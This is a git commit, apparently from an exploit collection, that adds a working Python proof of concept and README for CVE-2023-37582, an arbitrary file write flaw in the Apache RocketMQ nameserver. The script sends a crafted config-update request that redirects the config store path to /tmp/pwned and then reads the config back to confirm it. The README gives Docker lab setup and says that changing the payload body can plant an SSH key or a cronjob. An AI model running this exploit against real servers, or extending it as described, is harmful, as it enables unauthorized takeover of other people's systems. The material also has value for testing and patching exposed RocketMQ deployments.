add CVE-2023-37582 RocketMQ RCE

2023-09-12 08:57:05 +08:00 · 2023-09-12 08:57:05 +08:00 · 29bd78f739
commit 29bd78f739
parent dd7473c7d8
2 changed files with 126 additions and 0 deletions
--- a/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py
+++ b/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py
@ -0,0 +1,76 @@
+import sys
+import argparse
+import socket
+import binascii
+
+
+def exploit(address, port):
+    try:
+        client_socket = socket.socket()
+        client_socket.settimeout(5)  # Set socket timeout to 5 seconds
+        client_socket.connect((address, port))
+
+        # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java
+        # public static final int UPDATE_NAMESRV_CONFIG = 318;
+        header = '{"code":318,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode(
+            'utf-8')
+        body = 'configStorePath=/tmp/pwned\nproductEnvName=test/path\\ntest\\ntest'.encode('utf-8')
+
+        header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2)
+        header_length_hex = '00000000' + str(hex(header_length))[2:]
+        total_length = int(4 + len(binascii.hexlify(body).decode('utf-8')) / 2 + header_length)
+        total_length_hex = '00000000' + str(hex(total_length))[2:]
+        data = total_length_hex[-8:] + header_length_hex[-8:] + binascii.hexlify(header).decode(
+            'utf-8') + binascii.hexlify(body).decode('utf-8')
+
+        client_socket.send(bytes.fromhex(data))
+        data_received = client_socket.recv(1024)
+        print(data_received)
+
+        client_socket.close()
+    except socket.timeout:
+        print(f"Connection to {address}:{port} timed out")
+
+
+def get_namesrv_config(address, port):
+    try:
+        client_socket = socket.socket()
+        client_socket.settimeout(5)  # Set socket timeout to 5 seconds
+        client_socket.connect((address, port))
+
+        # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java
+        # public static final int GET_NAMESRV_CONFIG = 319;
+        header = '{"code":319,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode(
+            'utf-8')
+
+        header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2)
+        header_length_hex = '00000000' + str(hex(header_length))[2:]
+        total_length = int(4 + header_length)
+        total_length_hex = '00000000' + str(hex(total_length))[2:]
+        data = total_length_hex[-8:] + header_length_hex[-8:] + binascii.hexlify(header).decode('utf-8')
+
+        client_socket.send(bytes.fromhex(data))
+        data_received = client_socket.recv(1024)
+        print(data_received)
+
+        client_socket.close()
+    except socket.timeout:
+        print(f"Connection to {address}:{port} timed out")
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='RocketMQ Exploit')
+    parser.add_argument('-ip', default='127.0.0.1', help='Nameserver address')
+    parser.add_argument('-p', default=9876, type=int, help='Nameserver listen port')
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    args = parser.parse_args()
+
+    print('current nameserver config:')
+    get_namesrv_config(args.ip, args.p)
+    exploit(args.ip, args.p)
+    print('modified nameserver config:')
+    get_namesrv_config(args.ip, args.p)
--- a/00-CVE_EXP/CVE-2023-37582/README.md
+++ b/00-CVE_EXP/CVE-2023-37582/README.md
@ -0,0 +1,50 @@
+# CVE-2023-37582_EXPLOIT
+Apache RocketMQ Arbitrary File Write Vulnerability Exploit Demo
+
+# Overview
+In fact, the Arbitrary file write vulnerability(CVE-2023-37582) in Apache RocketMQ has already been addressed in the CVE-2023-33246 RCE vulnerability. 
+However, the fix provided for [CVE-2023-33246](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) RCE is not comprehensive as it only resolves the impact on RocketMQ's broker. 
+This vulnerability affects RocketMQ's nameserver, and exploiting it allows for arbitrary file write capabilities.
+
+
+
+
+# Setup local RocketMQ environment via Docker
+```bash
+
+# start name server
+docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.6 sh mqnamesrv
+
+# start broker
+docker run -d --name rmqbroker \
+  --link rmqnamesrv:namesrv \
+  -e "NAMESRV_ADDR=namesrv:9876" \
+  -p 10909:10909 \
+  -p 10911:10911 \
+  -p 10912:10912 \
+  apache/rocketmq:4.9.6 sh mqbroker \
+  -c /home/rocketmq/rocketmq-4.9.6/conf/broker.conf
+
+```
+
+# Exploit 
+
+It is important to note that the exploit provided is for demonstration purposes only. 
+The current exploit allows for the writing of a file to the nameserver's `/tmp/pwned` directory.
+Modifying the content of the `body` variable allows for the exploitation of this vulnerability by writing an OpenSSH private key or adding a cronjob. 
+However, it is crucial to remember that such activities are unauthorized and can lead to serious security breaches. 
+It is strongly advised to refrain from engaging in any malicious activities and to prioritize responsible and ethical cybersecurity practices.
+
+```
+usage: CVE-2023-37582.py [-h] [-ip IP] [-p P]
+
+RocketMQ Exploit
+
+optional arguments:
+  -h, --help  show this help message and exit
+  -ip IP      Nameserver address
+  -p P        Nameserver listen port
+```
+
+# References
+[RocketMQ commit: Fix incorrect naming](https://github.com/apache/rocketmq/pull/6843/files)